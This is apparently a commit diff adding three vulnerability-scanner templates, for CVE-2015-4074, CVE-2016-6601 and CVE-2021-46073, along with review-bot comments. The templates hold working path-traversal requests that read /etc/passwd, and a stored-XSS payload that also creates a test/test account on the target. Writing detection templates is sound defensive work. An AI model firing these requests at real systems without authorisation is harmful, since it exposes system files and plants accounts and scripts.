Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Showing 84 changed files with 1,540 additions and 396 deletions.
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,33 @@ | ||
id: CVE-2015-4074 | ||
info: | ||
name: Joomla Helpdesk Pro plugin before 1.4.0 - Local File Disclosure | ||
author: 0x_Akoko | ||
severity: high | ||
description: Directory traversal vulnerability in the Helpdesk Pro plugin before 1.4.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the filename parameter in a ticket.download_attachment task. | ||
reference: | ||
- https://packetstormsecurity.com/files/132766/Joomla-Helpdesk-Pro-XSS-File-Disclosure-SQL-Injection.html | ||
- https://www.exploit-db.com/exploits/37666/ | ||
- https://www.cvedetails.com/cve/CVE-2015-4074 | ||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4074 | ||
classification: | ||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N | ||
cvss-score: 7.5 | ||
cve-id: CVE-2015-4074 | ||
cwe-id: CWE-22 | ||
tags: lfi,packetstorm,edb,cve,cve2015,joomla,plugin | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/?option=com_helpdeskpro&task=ticket.download_attachment&filename=/../../../../../../../../../../../../etc/passwd&original_filename=AnyFileName.exe" | ||
|
||
matchers-condition: and | ||
matchers: | ||
|
||
- type: regex | ||
regex: | ||
- "root:[x*]:0:0" | ||
|
||
- type: status | ||
status: | ||
- 200 |
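
Review bot: the single `path:` entry requests only `/etc/passwd` and the regex matcher `root:[x*]:0:0` recognises only that file, so a vulnerable Helpdesk Pro install on a Windows host would be reported as clean; either state that limitation in `description:` or add a second path and matcher for a Windows file. The `info:` block also has no `remediation:` entry even though `name:` already says the issue is fixed in 1.4.0, and a blank line between `id:` and `info:` would match the layout of the CVE-2016-6601 template in this same commit.
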
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,32 @@ | ||
id: CVE-2016-6601 | ||
|
||
info: | ||
name: ZOHO WebNMS Framework 5.2 and 5.2 SP1 - Directory Traversal | ||
author: 0x_Akoko | ||
severity: high | ||
description: Directory traversal vulnerability in the file download functionality in ZOHO WebNMS Framework 5.2 and 5.2 SP1 allows remote attackers to read arbitrary files via a .. (dot dot) in the fileName parameter to servlets/FetchFile | ||
reference: | ||
- https://www.cvedetails.com/cve/CVE-2016-6601 | ||
- https://github.com/pedrib/PoC/blob/master/advisories/webnms-5.2-sp1-pwn.txt | ||
- https://www.exploit-db.com/exploits/40229/ | ||
classification: | ||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N | ||
cvss-score: 7.5 | ||
cve-id: CVE-2016-6601 | ||
cwe-id: CWE-22 | ||
tags: cve,cve2016,zoho,lfi,webnms | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/servlets/FetchFile?fileName=../../../etc/passwd" | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: regex | ||
regex: | ||
- "root:.*:0:0" | ||
|
||
- type: status | ||
status: | ||
- 200 |
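
Review bot: the matcher regex `root:.*:0:0` is looser than the `root:[x*]:0:0` used for the same file in the CVE-2015-4074 template in this commit; `.*` accepts any run of characters between `root:` and `:0:0` on a line, so use the bracketed form here as well to keep the two templates consistent and reduce false positives. The `description:` text is also missing its closing period after `servlets/FetchFile`.
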
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,53 @@ | ||
id: CVE-2021-46073 | ||
|
||
info: | ||
name: Vehicle Service Management System - Cross Site Scripting | ||
author: TenBird | ||
severity: medium | ||
description: | | ||
A Stored Cross Site Scripting (XSS) vulnerability exists in Sourcecodester Vehicle Service Management System 1.0 via the User List Section in login panel. | ||
reference: | ||
- https://github.com/plsanu/Vehicle-Service-Management-System-User-List-Stored-Cross-Site-Scripting-XSS | ||
- https://www.plsanu.com/vehicle-service-management-system-user-list-stored-cross-site-scripting-xss | ||
- https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html | ||
- https://nvd.nist.gov/vuln/detail/CVE-2021-46073 | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N | ||
cvss-score: 4.8 | ||
cve-id: CVE-2021-46073 | ||
cwe-id: CWE-79 | ||
metadata: | ||
verified: "true" | ||
tags: cve,cve2021,xss,vms,authenticated | ||
requests: | ||
- raw: | ||
- | | ||
POST /vehicle_service/classes/Login.php?f=login HTTP/1.1 | ||
Host: {{Hostname}} | ||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8 | ||
username={{username}}&password={{password}} | ||
- | | ||
POST /vehicle_service/classes/Users.php?f=save HTTP/1.1 | ||
Host: {{Hostname}} | ||
Content-Type: application/x-www-form-urlencoded | ||
firstname=test1%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&lastname=test&username=test&password=test&type=1 | ||
- | | ||
GET /vehicle_service/admin/?page=user/list HTTP/1.1 | ||
Host: {{Hostname}} | ||
req-condition: true | ||
redirects: true | ||
max-redirects: 2 | ||
cookie-reuse: true | ||
matchers-condition: and | ||
matchers: | ||
- type: dsl | ||
dsl: | ||
- "contains(all_headers_3, 'text/html')" | ||
- "status_code_3 == 200" | ||
- 'contains(body_3, "<script>alert(document.domain)</script> Test</td>")' | ||
condition: and |
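
Review bot: the second raw request (`Users.php?f=save`) stores a user with the fixed values `username=test&password=test&type=1` together with the script payload on the scanned system, and no later request removes it, so every run leaves a known-password account and a stored payload behind. Add the `intrusive` tag to `tags:` so the template is not run by default, randomise the username and password with `{{randstr}}`, and note the side effect in `description:`. The last DSL matcher also depends on the application rendering the submitted `lastname=test` as ` Test</td>`; a short comment explaining that expectation would help whoever maintains the matcher.
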